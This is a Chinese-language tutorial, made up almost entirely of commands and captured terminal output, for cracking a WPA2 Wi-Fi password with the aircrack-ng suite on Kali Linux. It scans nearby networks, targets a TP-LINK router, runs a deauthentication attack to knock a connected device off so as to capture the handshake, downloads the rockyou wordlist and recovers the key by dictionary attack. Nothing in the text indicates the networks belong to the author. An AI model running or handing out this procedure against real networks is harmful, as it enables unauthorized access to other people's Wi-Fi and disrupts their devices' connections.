# 查看得到网卡名为wlan0:
iwconfig
# 内容如下:
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any ...
# 找到Wi-Fi代号为wlan0,接着启动monitor模式:
airmon-ng start wlan0
# 查看附近的无线网络
airodump-ng wlan0mon
# 内容如下:
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F2:B4:29:E5:1C:74 -1 0 20 0 6 -1 OPN <length: 0>
94:77:2B:47:92:1C -74 119 1842 49 7 54e WPA2 CCMP PSK HUAWEI-RF4BXM
14:75:90:DB:90:91 -81 53 0 0 11 54e. WPA2 CCMP PSK TP-LINK_DB9091
# 选择一个Wi-Fi,复制BSSID,记下CH信道,组合如下命令开始攻击抓包
# [演示选择TP-Link:airodump-ng wlan0mon --bssid 复制的BSSID -c CH信道 -w 保存名]
airodump-ng wlan0mon --bssid 14:75:90:DB:90:91 -c 11 -w wificrack
# 可以看到,有一台设备连接到该路由WiFi,但此时没有设备连入,故抓不到完整4步握手包。
# 若抓不到4步握手,则通过以下命令断开设备与WiFi的连接,使其重新建立连接从而可以抓取四步握手信息:
# 新开一个Terminal窗口:[参数:攻击2次,路由ssid和设备Mac地址]
aireplay-ng -0 2 -a 14:75:90:DB:90:91 -c 54:DC:1D:27:0D:50 wlan0mon
# 原窗口得到握手包:内容如下:
CH 11 ][ Elapsed: 5 mins ][ 2018-01-29 05:52 ][ WPA handshake: 14:75:90:DB:90:91
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:75:90:DB:90:91 -71 93 3136 43 0 11 54e. WPA2 CCMP PSK TP-LINK_DB9091
BSSID STATION PWR Rate Lost Frames Probe
14:75:90:DB:90:91 54:DC:1D:27:0D:50 -39 0e- 0e 0 44 TP-LINK_DB9091
通过ls wificrack*命令查看抓到的信息保存的文件(多的wpa包是之前做测试保存下来的):
这里看最新的那个即wifi-04即可,可以看到总共有4个。
# 后面使用Kali Linux中默认存在的字典,目录[需要使用命令来解压]
/usr/share/wordlists/rockyou.txt.zip
# 这里顺便记录一下Kali中几个常用的字典文件的位置:
/usr/share/john/password.lst
/usr/share/wfuzz/wordlist
/usr/share/ wordlists
# 如果没有该文件,就需要下载:
wget http://scrapmaker.com/data/wordlists/dictionaries/rockyou.txt
# 破解:[rockyou.txt是字典、wifi-01.cap是抓包]
aircrack-ng -w rockyou.txt wificrack-01.cap
# 结果如下:[密码为:12345678]
Aircrack-ng 1.2 rc4
[00:00:00] 4/4 keys tested (31.56 k/s)
Time left: 0 seconds 100.00%
KEY FOUND! [ 12345678 ]
# 关闭wlan0无线网卡monitor mode
airmon-ng stop wlan0mon